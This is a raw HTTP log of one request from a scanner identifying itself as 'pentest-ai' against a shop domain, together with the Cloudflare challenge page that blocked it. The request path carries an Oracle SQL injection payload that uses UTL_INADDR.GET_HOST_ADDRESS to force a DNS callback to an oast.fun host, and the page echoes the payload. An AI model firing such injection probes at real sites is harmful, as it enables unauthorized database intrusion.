REQUEST:
GET https://my.myfirst.tech//my.myfirst.tech/cdn/shop/t/%27%20%7C%7C%20%28SELECT%20UTL_INADDR.GET_HOST_ADDRESS%28%27h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun%27%29%20FROM%20dual%29%20%7C%7C%20%27/assets/component-totals.css
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:24 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9923
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8477e3901a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=L5tJkogm7nmKEi%2F4X6up1%2BrgGz%2BYsVpIuw%2FER%2BoPUZttjTOpJ7PGvkTeVyLVecynPYXHc70Sro29hgB%2B67im45gnhfvFRI3e0rBvkb%2FxXZh%2FEwOFrhXtQtfi8anOVz689w%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8477e3901a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'ZsnqLPsJyyDHfH968fJOcRh0eYXrcSTB.2DC2apkYQg-1784281164-1.2.1.1-r_ck8em3ROJxLiLRB6ZXgqXrrvw3hM5AYHiHpBKg0APbDjk5P3n8TJkpiMAaLJCb',cITimeS: '1784281164',cRay: 'a1c8477e3901a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-totals.css?__cf_chl_tk=eDqGHsrVo389m2cOeFtk51yURF3MprYtcmjO4xnh7FI-1784281164-1.0.1.1-xfJKs81j_Xai3laQ01UPgh886ejnWq7f3qgE9noHeQI",cvId: '3',cZone: 'my.myfirst.tech',fa:"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-totals.css?__cf_chl_f_tk=eDqGHsrVo389m2cOeFtk51yURF3MprYtcmjO4xnh7FI-1784281164-1.0.1.1-xfJKs81j_Xai3laQ01UPgh886ejnWq7f3qgE9noHeQI",md: 'YbmpDITfIsW6u_nzsrJU7L0_.anZ1PB2bTbUCtSV1P0-1784281164-1.2.1.1-CRrcy_WBUWGj7uAUvCpC7jnLMjnaX9vgPIcIlJ0j5WlHo3gzfLua8Okc6J7_04Ph3UEhCoJm4qWRVAo25Kb1IQmGYuFegFlujc_DJC78t9phgBySCeFEo1.L2AXLpIuQJzeV3FWTO8BKp_oCEkgvEwI1niqU_kl5PK4ede9FObzd.mFDm7B2o3XXIPHDCJPR_pQv21XzY7gfwjgD5IB49ptk5JnyLnF0j4DRVSB8iBYshNgJXOchU9lsIu.fpeV_rfLoktjdGxNRB4OTx2gROo8PSB1B.HvmCNmLNASVNEMXJV1WGcXh9cWxjLTJq.nw0LjPcTLV5ObTLHSfbAYynFjZteB4aP8YrJ1m_4gqx1QeWiWa0coJHXcN73EnP2tRTtMoJCAtyY0scSudzY0FAkpdMGDR4awqgzHWNfGh.PgV21TBXWcaJKXsb47KBcK.z..FxFvmcpEl26zM__4LETritcJgKnDPkgkYGZere2mNsnZ4mbyZOQp701S98cpVW_e6zl0gnrsdHXgf1yn9oOfcBtfSDvGqM34qHMZZag0P7.uRMhgacFcu8SMDlAQnUIC1a1SF65KeSSP3iGMJ7_NeurkSX5tEBuC.xxgbKIPZpy_20XxeWN9TdS8n_U2jHISMogTxuj_stMCGtxN_TSGH0G09TXwaVomk8GP2BrQeb6D9hvWDaE_5R1HGjTtT3EE9zL1mYK.TMZb1QHVUsSrcShrA5Bhkv21mwjTI_WEyXMAQzIhqBrdhFUiqVh_w9oPvqAx4vdhfv34StJvA4LpD7KYkdyT.yQgHcPDmSnaBwir0HcIVO2.o_JWyXX33DMNWR5lKmRevlXDtAOsl.rqHlxK4dVp6KWWJU7oc.O1VUXy70jRKzPAYl6wAgO3yAWSM8aRvfLGnhKcHpBctrneYlUSGusN3XVzntVRbY_QVQHfLajMaYnvk5vOZWV_d8nrjD17Uk4B6ECcUiDUceIa0Lh_sH3PvHVvrD.pem8xo5CrG78cXm78V9nnetcPuZV3v.WF0Ai_1bSxL9bFYTuuZd50KzDf2GhFgfKaL9E3h.Urn3gld0lPqr1sE__Oni_nUwIa8GbxrkYehI3UnXaQt9kmo5ZRLS4JCOPwmToA3kCmpHkTDwXziO9I0nQZfI_VZ5QpSonQ9HochTeMvTw4jsXeqAzSmP6.ZtHCump2ohRVEn19Exuh_Aw92zDx4Efe3i6m83DPlb63Nn.vIhxaHGGFecT._s3.6qsNPQ_9v3FyWVwbnNubOw9VLnFWH0qie4NHUV2L29DAMfJ1G1M5WE3KBW5RgPETAsKlf8zVGdyuXx_3Di0sz69L4RaMiGmgZ3xH.QNjMH.grPt1RReWfV2acF0.f6wxd.4EGfR4',mdrd: 'FAX1eQv7nSuMNMjsRfyUEcPnnVVeuMJLoiXRdHYeqXM-1784281164-1.2.1.1-NLWOgDRmblX0OCSUWo1g1KYtAUwC.QgqdyslpkcPaml9PZrGwgp3hvb10EblVc8Y_S3r5P2zDcxJjt82ChE7RkikxQgZIwG9CpUVGg3uBEVGIglDLHz_i6zKRdyDw4bQeqmWSzBGuqkwhtQh0gvTfZNlSWwuNwLjCk1cXHrIikH2oRARymxgZFYO1mnaLVRrx3Ofo76OefZrwMspF1eecsID3ePYNfOcPQIj7MHnauSeA1Fty8BwZwpluKoijm4o',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8477e3901a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/my.myfirst.tech/cdn/shop/t/'%20%7C%7C%20(SELECT%20UTL_INADDR.GET_HOST_ADDRESS('h0cqg45t8jh21623dc0zv3umxqpd07eho.oast.fun')%20FROM%20dual)%20%7C%7C%20'/assets/component-totals.css?__cf_chl_rt_tk=eDqGHsrVo389m2cOeFtk51yURF3MprYtcmjO4xnh7FI-1784281164-1.0.1.1-xfJKs81j_Xai3laQ01UPgh886ejnWq7f3qgE9noHeQI"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
